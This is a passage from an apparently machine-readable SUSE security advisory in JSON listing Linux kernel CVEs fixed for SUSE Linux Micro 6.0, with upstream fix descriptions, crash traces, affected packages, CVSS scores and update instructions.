"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2026-22993"
},
{
"cve": "CVE-2026-22996",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22996"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Don\u0027t store mlx5e_priv in mlx5e_dev devlink priv\n\nmlx5e_priv is an unstable structure that can be memset(0) if profile\nattaching fails, mlx5e_priv in mlx5e_dev devlink private is used to\nreference the netdev and mdev associated with that struct. Instead,\nstore netdev directly into mlx5e_dev and get mdev from the containing\nmlx5_adev aux device structure.\n\nThis fixes a kernel oops in mlx5e_remove when switchdev mode fails due\nto change profile failure.\n\n$ devlink dev eswitch set pci/0000:00:03.0 mode switchdev\nError: mlx5_core: Failed setting eswitch to offloads.\ndmesg:\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12\n\n$ devlink dev reload pci/0000:00:03.0 ==\u003e oops\n\nBUG: kernel NULL pointer dereference, address: 0000000000000520\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] SMP NOPTI\nCPU: 3 UID: 0 PID: 521 Comm: devlink Not tainted 6.18.0-rc5+ #117 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:mlx5e_remove+0x68/0x130\nRSP: 0018:ffffc900034838f0 EFLAGS: 00010246\nRAX: ffff88810283c380 RBX: ffff888101874400 RCX: ffffffff826ffc45\nRDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000\nRBP: ffff888102d789c0 R08: ffff8881007137f0 R09: ffff888100264e10\nR10: ffffc90003483898 R11: ffffc900034838a0 R12: ffff888100d261a0\nR13: ffff888100d261a0 R14: ffff8881018749a0 R15: ffff888101874400\nFS: 00007f8565fea740(0000) GS:ffff88856a759000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000520 CR3: 000000010b11a004 CR4: 0000000000370ef0\nCall Trace:\n \u003cTASK\u003e\n device_release_driver_internal+0x19c/0x200\n bus_remove_device+0xc6/0x130\n device_del+0x160/0x3d0\n ? devl_param_driverinit_value_get+0x2d/0x90\n mlx5_detach_device+0x89/0xe0\n mlx5_unload_one_devl_locked+0x3a/0x70\n mlx5_devlink_reload_down+0xc8/0x220\n devlink_reload+0x7d/0x260\n devlink_nl_reload_doit+0x45b/0x5a0\n genl_family_rcv_msg_doit+0xe8/0x140",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22996",
"url": "https://www.suse.com/security/cve/CVE-2026-22996"
},
{
"category": "external",
"summary": "SUSE Bug 1257203 for CVE-2026-22996",
"url": "https://bugzilla.suse.com/1257203"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2026-22996"
},
{
"cve": "CVE-2026-22997",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22997"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: can: j1939: j1939_xtp_rx_rts_session_active(): deactivate session upon receiving the second rts\n\nSince j1939_session_deactivate_activate_next() in j1939_tp_rxtimer() is\ncalled only when the timer is enabled, we need to call\nj1939_session_deactivate_activate_next() if we cancelled the timer.\nOtherwise, refcount for j1939_session leaks, which will later appear as\n\n| unregister_netdevice: waiting for vcan0 to become free. Usage count = 2.\n\nproblem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22997",
"url": "https://www.suse.com/security/cve/CVE-2026-22997"
},
{
"category": "external",
"summary": "SUSE Bug 1257202 for CVE-2026-22997",
"url": "https://bugzilla.suse.com/1257202"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2026-22997"
},
{
"cve": "CVE-2026-22999",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22999"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: do not free existing class in qfq_change_class()\n\nFixes qfq_change_class() error case.\n\ncl-\u003eqdisc and cl should only be freed if a new class and qdisc\nwere allocated, or we risk various UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22999",
"url": "https://www.suse.com/security/cve/CVE-2026-22999"
},
{
"category": "external",
"summary": "SUSE Bug 1257236 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "external",
"summary": "SUSE Bug 1257238 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257238"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2026-22999"
},
{
"cve": "CVE-2026-23000",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23000"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Fix crash on profile change rollback failure\n\nmlx5e_netdev_change_profile can fail to attach a new profile and can\nfail to rollback to old profile, in such case, we could end up with a\ndangling netdev with a fully reset netdev_priv. A retry to change\nprofile, e.g. another attempt to call mlx5e_netdev_change_profile via\nswitchdev mode change, will crash trying to access the now NULL\npriv-\u003emdev.\n\nThis fix allows mlx5e_netdev_change_profile() to handle previous\nfailures and an empty priv, by not assuming priv is valid.\n\nPass netdev and mdev to all flows requiring\nmlx5e_netdev_change_profile() and avoid passing priv.\nIn mlx5e_netdev_change_profile() check if current priv is valid, and if\nnot, just attach the new profile without trying to access the old one.\n\nThis fixes the following oops, when enabling switchdev mode for the 2nd\ntime after first time failure:\n\n ## Enabling switchdev mode first time:\n\nmlx5_core 0012:03:00.1: E-Switch: Supported tc chains and prios offload\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12\n ^^^^^^^^\nmlx5_core 0000:00:03.0: E-Switch: Disable: mode(LEGACY), nvfs(0), necvfs(0), active vports(0)\n\n ## retry: Enabling switchdev mode 2nd time:\n\nmlx5_core 0000:00:03.0: E-Switch: Supported tc chains and prios offload\nBUG: kernel NULL pointer dereference, address: 0000000000000038\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] SMP NOPTI\nCPU: 13 UID: 0 PID: 520 Comm: devlink Not tainted 6.18.0-rc4+ #91 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:mlx5e_detach_netdev+0x3c/0x90\nCode: 50 00 00 f0 80 4f 78 02 48 8b bf e8 07 00 00 48 85 ff 74 16 48 8b 73 78 48 d1 ee 83 e6 01 83 f6 01 40 0f b6 f6 e8 c4 42 00 00 \u003c48\u003e 8b 45 38 48 85 c0 74 08 48 89 df e8 cc 47 40 1e 48 8b bb f0 07\nRSP: 0018:ffffc90000673890 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: ffff8881036a89c0 RCX: 0000000000000000\nRDX: ffff888113f63800 RSI: ffffffff822fe720 RDI: 0000000000000000\nRBP: 0000000000000000 R08: 0000000000002dcd R09: 0000000000000000\nR10: ffffc900006738e8 R11: 00000000ffffffff R12: 0000000000000000\nR13: 0000000000000000 R14: ffff8881036a89c0 R15: 0000000000000000\nFS: 00007fdfb8384740(0000) GS:ffff88856a9d6000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000038 CR3: 0000000112ae0005 CR4: 0000000000370ef0\nCall Trace:\n \u003cTASK\u003e\n mlx5e_netdev_change_profile+0x45/0xb0\n mlx5e_vport_rep_load+0x27b/0x2d0\n mlx5_esw_offloads_rep_load+0x72/0xf0\n esw_offloads_enable+0x5d0/0x970\n mlx5_eswitch_enable_locked+0x349/0x430\n ? is_mp_supported+0x57/0xb0\n mlx5_devlink_eswitch_mode_set+0x26b/0x430\n devlink_nl_eswitch_set_doit+0x6f/0xf0\n genl_family_rcv_msg_doit+0xe8/0x140\n genl_rcv_msg+0x18b/0x290\n ? __pfx_devlink_nl_pre_doit+0x10/0x10\n ? __pfx_devlink_nl_eswitch_set_doit+0x10/0x10\n ? __pfx_devlink_nl_post_doit+0x10/0x10\n ? __pfx_genl_rcv_msg+0x10/0x10\n netlink_rcv_skb+0x52/0x100\n genl_rcv+0x28/0x40\n netlink_unicast+0x282/0x3e0\n ? __alloc_skb+0xd6/0x190\n netlink_sendmsg+0x1f7/0x430\n __sys_sendto+0x213/0x220\n ? __sys_recvmsg+0x6a/0xd0\n __x64_sys_sendto+0x24/0x30\n do_syscall_64+0x50/0x1f0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\nRIP: 0033:0x7fdfb8495047",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23000",
"url": "https://www.suse.com/security/cve/CVE-2026-23000"
},
{
"category": "external",
"summary": "SUSE Bug 1257234 for CVE-2026-23000",
"url": "https://bugzilla.suse.com/1257234"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2026-23000"
},
{
"cve": "CVE-2026-23001",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23001"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacvlan: fix possible UAF in macvlan_forward_source()\n\nAdd RCU protection on (struct macvlan_source_entry)-\u003evlan.\n\nWhenever macvlan_hash_del_source() is called, we must clear\nentry-\u003evlan pointer before RCU grace period starts.\n\nThis allows macvlan_forward_source() to skip over\nentries queued for freeing.\n\nNote that macvlan_dev are already RCU protected, as they\nare embedded in a standard netdev (netdev_priv(ndev)).\n\nhttps: //lore.kernel.org/netdev/695fb1e8.050a0220.1c677c.039f.GAE@google.com/T/#u",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23001",
"url": "https://www.suse.com/security/cve/CVE-2026-23001"
},
{
"category": "external",
"summary": "SUSE Bug 1257232 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "external",
"summary": "SUSE Bug 1257233 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257233"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2026-23001"
},
{
"cve": "CVE-2026-23005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23005"
}
],
"notes": [
{
"category": "general",
